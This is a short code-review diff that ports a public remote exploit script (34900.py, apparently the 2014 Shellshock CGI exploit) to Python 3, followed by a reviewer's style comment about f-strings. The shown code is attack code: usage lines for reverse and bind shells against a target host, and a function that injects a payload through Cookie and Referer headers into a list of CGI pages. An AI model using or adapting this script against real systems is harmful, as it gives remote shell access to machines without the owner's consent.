exploits/linux/remote/34900.py

```diff
@@ -29,118 +36,128 @@ def usage():
 
 Example:
 
-./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
-./exploit.py payload=bind rhost=1.2.3.4 rport=1234
+./34900.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
+./34900.py payload=bind rhost=1.2.3.4 rport=1234
 
 Credits:
 
-Federico Galatolo 2014
-"""
-	sys.exit(0)
-
-def exploit(lhost,lport,rhost,rport,payload,pages):
-	headers = {"Cookie": payload, "Referer": payload}
-
-	for page in pages:
-		if stop:
-			return
-		print "[-] Trying exploit on : "+page
-		if proxyhost != "":
-			c = httplib.HTTPConnection(proxyhost,proxyport)
-			c.request("GET","http://"+rhost+page,headers=headers)
-			res = c.getresponse()
-		else:
-			c = httplib.HTTPConnection(rhost)
-			c.request("GET",page,headers=headers)
-			res = c.getresponse()
-		if res.status == 404:
-			print "[*] 404 on : "+page
-		time.sleep(1)
+made by Federico Galatolo 2014
+updated by Luca Cuzzolin aka czz78 2021
+""")
+    sys.exit(0)
+
+def exploit(lhost, lport, rhost, rport, payload, pages):
+    headers = {"Cookie": payload, "Referer": payload}
+
+    for page in pages:
+        if stop:
+            return
+        print("[-] Trying exploit on : " + page)
+        if proxyhost != "":
+            c = httplib.HTTPConnection(proxyhost, proxyport)
+            c.request("GET","http://" + rhost + page, headers=headers)
```

Comment:
In the future, a faster/cleaner way to concat text in python is this way 

`c.request("GET", f"http://{rhost}{page}", headers=headers)`